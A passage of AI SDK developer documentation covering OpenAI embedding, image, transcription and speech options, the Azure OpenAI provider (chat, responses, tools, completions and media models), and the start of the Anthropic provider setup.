import { embed } from 'ai';

const { embedding } = await embed({
  model: openai.embedding('text-embedding-3-large'),
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // optional, number of dimensions for the embedding
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAIEmbeddingModelOptions,
  },
});

The following optional provider options are available for OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`text-embedding-3-large`	3072
`text-embedding-3-small`	1536
`text-embedding-ada-002`	1536

Image Models

You can create models that call the OpenAI image generation API using the .image() factory method.

const model = openai.image('dall-e-3');

Image Editing

OpenAI's gpt-image-1 model supports powerful image editing capabilities. Pass input images via prompt.images to transform, combine, or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'Turn the cat into a dog but retain the style of the original image',
    images: [imageBuffer],
  },
});

Inpainting with Mask

Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // Transparent areas = edit regions

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
});

Background Removal

Remove the background from an image by setting background to transparent:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'do not change anything',
    images: [imageBuffer],
  },
  providerOptions: {
    openai: {
      background: 'transparent',
      output_format: 'png',
    },
  },
});

Multi-Image Combining

Combine multiple reference images into a single output. gpt-image-1 supports up to 16 input images:

const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const owl = readFileSync('./owl.png');
const bear = readFileSync('./bear.png');

const { images } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: {
    text: 'Combine these animals into a group photo, retaining the original style',
    images: [cat, dog, owl, bear],
  },
});

Model Capabilities

Model	Sizes
`gpt-image-1.5`	1024x1024, 1536x1024, 1024x1536
`gpt-image-1-mini`	1024x1024, 1536x1024, 1024x1536
`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
`dall-e-3`	1024x1024, 1792x1024, 1024x1792
`dall-e-2`	256x256, 512x512, 1024x1024

You can pass optional providerOptions to the image model. These are prone to change by OpenAI and are model dependent. For example, the gpt-image-1 model supports the quality option:

const { image, providerMetadata } = await generateImage({
  model: openai.image('gpt-image-1.5'),
  prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
  providerOptions: {
    openai: { quality: 'high' },
  },
});

For more on generateImage() see Image Generation.

OpenAI's image models return additional metadata in the response that can be accessed via providerMetadata.openai. The following OpenAI-specific metadata is available:

images Array<object>

Array of image-specific metadata. Each image object may contain:
- revisedPrompt string - The revised prompt that was actually used to generate the image (OpenAI may modify your prompt for safety or clarity)
- created number - The Unix timestamp (in seconds) of when the image was created
- size string - The size of the generated image. One of 1024x1024, 1024x1536, or 1536x1024
- quality string - The quality of the generated image. One of low, medium, or high
- background string - The background parameter used for the image generation. Either transparent or opaque
- outputFormat string - The output format of the generated image. One of png, webp, or jpeg

For more information on the available OpenAI image model options, see the OpenAI API reference.

Transcription Models

You can create models that call the OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = openai.transcription('whisper-1');

import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';

const result = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: {
    openai: { language: 'en' } satisfies OpenAITranscriptionModelOptions,
  },
});

To get word-level timestamps, specify the granularity:

import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';

const result = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: {
    openai: {
      //timestampGranularities: ['word'],
      timestampGranularities: ['segment'],
    } satisfies OpenAITranscriptionModelOptions,
  },
});

// Access word-level timestamps
console.log(result.segments); // Array of segments with startSecond/endSecond

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

Speech Models

You can create models that call the OpenAI speech API using the .speech() factory method.

The first argument is the model id e.g. tts-1.

const model = openai.speech('tts-1');

The voice argument can be set to one of OpenAI's available voices: alloy, ash, coral, echo, fable, onyx, nova, sage, or shimmer.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy', // OpenAI voice ID
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai, type OpenAISpeechModelOptions } from '@ai-sdk/openai';

const result = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy',
  providerOptions: {
    openai: {
      speed: 1.2,
    } satisfies OpenAISpeechModelOptions,
  },
});

instructions string Control the voice of your generated audio with additional instructions e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
speed number The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.

Model Capabilities

Model	Instructions
`tts-1`
`tts-1-hd`
`gpt-4o-mini-tts`

title: Azure OpenAI description: Learn how to use the Azure OpenAI provider for the AI SDK.

Azure OpenAI Provider

The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.

Setup

The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with

Provider Instance

You can import the default provider instance azure from @ai-sdk/azure:

import { azure } from '@ai-sdk/azure';

If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:

import { createAzure } from '@ai-sdk/azure';

const azure = createAzure({
  resourceName: 'your-resource-name', // Azure resource name
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the OpenAI provider instance:

resourceName string

Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable.

The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/v1{path}. You can use baseURL instead to specify the URL prefix.
apiKey string

API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.
apiVersion string

Sets a custom api version. Defaults to v1.
baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers.

Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored.

With a baseURL, the resolved URL is {baseURL}/v1{path}.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
useDeploymentBasedUrls boolean

Use deployment-based URLs for API calls. Set to true to use the legacy deployment format: {baseURL}/deployments/{deploymentId}{path}?api-version={apiVersion} instead of {baseURL}/v1{path}?api-version={apiVersion}. Defaults to false.

This option is useful for compatibility with certain Azure OpenAI models or deployments that require the legacy endpoint format.

Language Models

The Azure OpenAI provider instance is a function that you can invoke to create a language model:

const model = azure('your-deployment-name');

You need to pass your deployment name as the first argument.

Reasoning Models

import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: azure('your-deepseek-r1-deployment-name'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use OpenAI language models to generate text with the generateText function:

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const { text } = await generateText({
  model: azure('your-deployment-name'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Provider Options

import { azure, type OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';

const messages = [
  {
    role: 'user',
    content: [
      {
        type: 'text',
        text: 'What is the capital of the moon?',
      },
      {
        type: 'image',
        image: 'https://example.com/image.png',
        providerOptions: {
          openai: { imageDetail: 'low' },
        },
      },
    ],
  },
];

const { text } = await generateText({
  model: azure('your-deployment-name'),
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

Chat Models

You can create models that call the Azure OpenAI chat completions API using the .chat() factory method:

const model = azure.chat('your-deployment-name');

Azure OpenAI chat models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { azure, type OpenAILanguageModelChatOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.chat('your-deployment-name'),
  prompt: 'Write a short story about a robot.',
  providerOptions: {
    openai: {
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelChatOptions,
  },
});

The following optional provider options are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Default to true.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Responses Models

Azure OpenAI uses responses API as default with the azure(deploymentName) factory method.

const model = azure('your-deployment-name');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAILanguageModelResponsesOptions type.

import { azure, OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('your-deployment-name'),
  providerOptions: {
    azure: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAILanguageModelResponsesOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean Whether to store the generation. Defaults to true.
metadata Record<string, string> Additional metadata to store with the generation.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'low' | 'medium' | 'high' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to false.

The Azure OpenAI provider also returns provider-specific metadata:

For Responses models (azure(deploymentName)), you can type this metadata using AzureResponsesProviderMetadata:

import { azure, type AzureResponsesProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('your-deployment-name'),
});

const providerMetadata = result.providerMetadata as
  | AzureResponsesProviderMetadata
  | undefined;

const { responseId, logprobs, serviceTier } = providerMetadata?.azure ?? {};

// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);

The following Azure-specific metadata may be returned:

responseId string | null | undefined The ID of the response. Can be used to continue a conversation.
logprobs (optional) Log probabilities of output tokens (when enabled).
serviceTier (optional) Service tier information returned by the API.

Web Search Tool

The Azure OpenAI responses API supports web search(preview) through the azure.tools.webSearchPreview tool.

const result = await generateText({
  model: azure('gpt-4.1-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: azure.tools.webSearchPreview({
      // optional configuration:
      searchContextSize: 'low',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
  // Force web search tool (optional):
  toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});

console.log(result.text);

// URL sources directly from `results`
const sources = result.sources;
for (const source of sources) {
  console.log('source:', source);
}

File Search Tool

The Azure OpenAI provider supports file search through the azure.tools.fileSearch tool.

You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.

const result = await generateText({
  model: azure('gpt-5'),
  prompt: 'What does the document say about user authentication?',
  tools: {
    file_search: azure.tools.fileSearch({
      // optional configuration:
      vectorStoreIds: ['vs_123', 'vs_456'],
      maxNumResults: 10,
      ranking: {
        ranker: 'auto',
      },
    }),
  },
  // Force file search tool:
  toolChoice: { type: 'tool', toolName: 'file_search' },
});

Image Generation Tool

Azure OpenAI's Responses API supports multi-modal image generation as a provider-defined tool. Availability is restricted to specific models (for example, gpt-5 variants).

import { createAzure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const azure = createAzure({
  headers: {
    'x-ms-oai-image-generation-deployment': 'gpt-image-1', // use your own image model deployment
  },
});

const result = await generateText({
  model: azure('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: azure.tools.imageGeneration({ outputFormat: 'png' }),
  },
});

for (const toolResult of result.staticToolResults) {
  if (toolResult.toolName === 'image_generation') {
    const base64Image = toolResult.output.result;
  }
}

Code Interpreter Tool

The Azure OpenAI provider supports the code interpreter tool through the azure.tools.codeInterpreter tool. This allows models to write and execute Python code.

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('gpt-5'),
  prompt: 'Write and run Python code to calculate the factorial of 10',
  tools: {
    code_interpreter: azure.tools.codeInterpreter({
      // optional configuration:
      container: {
        fileIds: ['assistant-123', 'assistant-456'], // optional file IDs to make available
      },
    }),
  },
});

The code interpreter tool can be configured with:

container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter

PDF support

The Azure OpenAI provider supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: azure('your-deployment-name'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

Typed providerMetadata in Text Parts

When using the Azure OpenAI Responses API, the SDK attaches Azure OpenAI-specific metadata to output parts via providerMetadata.

For text parts, when part.type === 'text', the providerMetadata is provided in the form of AzureResponsesTextProviderMetadata.

This metadata includes the following fields:

itemId
The ID of the output item in the Responses API.
annotations (optional) An array of annotation objects generated by the model. If no annotations are present, this property itself may be omitted (undefined).

Each element in annotations is a discriminated union with a required type field. Supported types include, for example:
- url_citation
- file_citation
- container_file_citation
- file_path
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.

import { azure, type AzureResponsesTextProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: azure.tools.codeInterpreter(),
    web_search_preview: azure.tools.webSearchPreview({}),
    file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'text') {
    const providerMetadata = part.providerMetadata as
      | AzureResponsesTextProviderMetadata
      | undefined;
    if (!providerMetadata) continue;
    const { itemId: _itemId, annotations } = providerMetadata.azure;

    if (!annotations) continue;
    for (const annotation of annotations) {
      switch (annotation.type) {
        case 'url_citation':
          // url_citation is returned from web_search and provides:
          // properties: type, url, title, start_index and end_index
          break;
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, file_id, filename and index
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, container_id, file_id, filename, start_index and end_index
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, file_id and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Typed providerMetadata in Reasoning Parts

When using the Azure OpenAI Responses API, reasoning output parts can include provider metadata. To handle this metadata in a type-safe way, use AzureResponsesReasoningProviderMetadata.

For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of AzureResponsesReasoningProviderMetadata.

This metadata includes the following fields:

itemId
The ID of the reasoning item in the Responses API.
reasoningEncryptedContent (optional)
Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).

import {
  azure,
  type AzureResponsesReasoningProviderMetadata,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('your-deployment-name'),
  prompt: 'How many "r"s are in the word "strawberry"?',
  providerOptions: {
    azure: {
      store: false,
      include: ['reasoning.encrypted_content'],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

for (const part of result.content) {
  if (part.type === 'reasoning') {
    const providerMetadata = part.providerMetadata as
      | AzureResponsesReasoningProviderMetadata
      | undefined;

    const { itemId, reasoningEncryptedContent } = providerMetadata?.azure ?? {};
    console.log(itemId, reasoningEncryptedContent);
  }
}

Typed providerMetadata in Source Document Parts

For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as AzureResponsesSourceDocumentProviderMetadata.

This metadata is also a discriminated union with a required type field. Supported types include:

file_citation
container_file_citation
file_path

Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.

import {
  azure,
  type AzureResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: azure.tools.codeInterpreter(),
    web_search_preview: azure.tools.webSearchPreview({}),
    file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'source') {
    if (part.sourceType === 'document') {
      const providerMetadata = part.providerMetadata as
        | AzureResponsesSourceDocumentProviderMetadata
        | undefined;
      if (!providerMetadata) continue;
      const annotation = providerMetadata.azure;
      switch (annotation.type) {
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, fileId and index
          // The filename can be accessed via part.filename.
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, containerId and fileId
          // The filename can be accessed via part.filename.
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, fileId and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Completion Models

You can create models that call the completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-35-turbo-instruct is supported.

const model = azure.completion('your-gpt-35-turbo-instruct-deployment');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import {
  azure,
  type OpenAILanguageModelCompletionOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.completion('your-gpt-35-turbo-instruct-deployment'),
  prompt: 'Write a haiku about coding.',
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelCompletionOptions,
  },
});

The following optional provider options are available for Azure OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Embedding Models

You can create models that call the Azure OpenAI embeddings API using the .embedding() factory method.

const model = azure.embedding('your-embedding-deployment');

Azure OpenAI embedding models support several additional settings. You can pass them as an options argument:

import { azure, type OpenAIEmbeddingModelOptions } from '@ai-sdk/azure';
import { embed } from 'ai';

const { embedding } = await embed({
  model: azure.embedding('your-embedding-deployment'),
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // optional, number of dimensions for the embedding
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAIEmbeddingModelOptions,
  },
});

The following optional provider options are available for Azure OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Image Models

You can create models that call the Azure OpenAI image generation API (DALL-E) using the .image() factory method. The first argument is your deployment name for the DALL-E model.

const model = azure.image('your-dalle-deployment-name');

Azure OpenAI image models support several additional settings. You can pass them as providerOptions.openai when generating the image:

await generateImage({
  model: azure.image('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
  providerOptions: {
    openai: {
      user: 'test-user', // optional unique user identifier
      responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
    },
  },
});

Example

You can use Azure OpenAI image models to generate images with the generateImage function:

import { azure } from '@ai-sdk/azure';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: azure.image('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});

// image contains the URL or base64 data of the generated image
console.log(image);

Model Capabilities

Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:

Model Version	Sizes
DALL-E 3	1024x1024, 1792x1024, 1024x1792
DALL-E 2	256x256, 512x512, 1024x1024

Transcription Models

You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = azure.transcription('whisper-1');

const azure = createAzure({
  useDeploymentBasedUrls: true,
  apiVersion: '2025-04-01-preview',
});

import { experimental_transcribe as transcribe } from 'ai';
import { azure, type OpenAITranscriptionModelOptions } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: azure.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    openai: {
      language: 'en',
    } satisfies OpenAITranscriptionModelOptions,
  },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

Speech Models

You can create models that call the Azure OpenAI speech API using the .speech() factory method.

The first argument is your deployment name for the text-to-speech model (e.g., tts-1).

const model = azure.speech('your-tts-deployment-name');

Example

import { azure } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const result = await generateSpeech({
  model: azure.speech('your-tts-deployment-name'),
  text: 'Hello, world!',
  voice: 'alloy', // OpenAI voice ID
});

You can also pass additional provider-specific options using the providerOptions argument:

import { azure, type OpenAISpeechModelOptions } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const result = await generateSpeech({
  model: azure.speech('your-tts-deployment-name'),
  text: 'Hello, world!',
  voice: 'alloy',
  providerOptions: {
    openai: {
      speed: 1.2,
    } satisfies OpenAISpeechModelOptions,
  },
});

The following provider options are available:

instructions string Control the voice of your generated audio with additional instructions e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
speed number The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.

Model Capabilities

Azure OpenAI supports TTS models through deployments. The capabilities depend on which model version your deployment is using:

Model Version	Instructions
`tts-1`
`tts-1-hd`
`gpt-4o-mini-tts`

title: Anthropic description: Learn how to use the Anthropic provider for the AI SDK.

Anthropic Provider

The Anthropic provider contains language model support for the Anthropic Messages API.

Setup

The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with

Provider Instance

You can import the default provider instance anthropic from @ai-sdk/anthropic:

import { anthropic } from '@ai-sdk/anthropic';

If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:

import { createAnthropic } from '@ai-sdk/anthropic';

const anthropic = createAnthropic({
  // custom settings
});

You can use the following optional settings to customize the Anthropic provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.anthropic.com/v1.
apiKey string

API key that is being sent using the x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable. Only one of apiKey or authToken is required.
authToken string

Auth token that is being sent using the Authorization: Bearer header. It defaults to the ANTHROPIC_AUTH_TOKEN environment variable. Only one of apiKey or authToken is required.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can also use the following aliases for model creation:

anthropic.languageModel('claude-3-haiku-20240307') - Creates a language model
anthropic.chat('claude-3-haiku-20240307') - Alias for languageModel
anthropic.messages('claude-3-haiku-20240307') - Alias for languageModel

You can use Anthropic language models to generate text with the generateText function:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

The following optional provider options are available for Anthropic models:

disableParallelToolUse boolean

Optional. Disables the use of parallel tool calls. Defaults to false.

When set to true, the model will only call one tool at a time instead of potentially calling multiple tools in parallel.
sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
effort "low" | "medium" | "high" | "xhigh" | "max"

Optional. See Effort section for more details.
taskBudget object

Optional. See Task Budgets section for more details.
speed "fast" | "standard"

Optional. See Fast Mode section for more details.
inferenceGeo "us" | "global"

Optional. See Data Residency section for more details.
thinking object

Optional. See Reasoning section for more details.
toolStreaming boolean

Whether to enable tool streaming (and structured output streaming). Default to true.
structuredOutputMode "outputFormat" | "jsonTool" | "auto"

Determines how structured outputs are generated. Optional.
- "outputFormat": Use the output_format parameter to specify the structured output format.
- "jsonTool": Use a special "json" tool to specify the structured output format.
- "auto": Use "outputFormat" when supported, otherwise fall back to "jsonTool" (default).
metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user. Should be a UUID, hash, or other opaque identifier. Must not contain PII.

Structured Outputs and Tool Input Streaming

Tool call streaming is enabled by default. You can opt out by setting the toolStreaming provider option to false.

import { anthropic } from '@ai-sdk/anthropic';
import { streamText, tool } from 'ai';
import { z } from 'zod';

const result = streamText({
  model: anthropic('claude-sonnet-4-20250514'),
  tools: {
    writeFile: tool({
      description: 'Write content to a file',
      inputSchema: z.object({
        path: z.string(),
        content: z.string(),
      }),
      execute: async ({ path, content }) => {
        // Implementation
        return { success: true };
      },
    }),
  },
  prompt: 'Write a short story to story.txt',
});

Effort

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, usage } = await generateText({
  model: anthropic('claude-opus-4-20250514'),
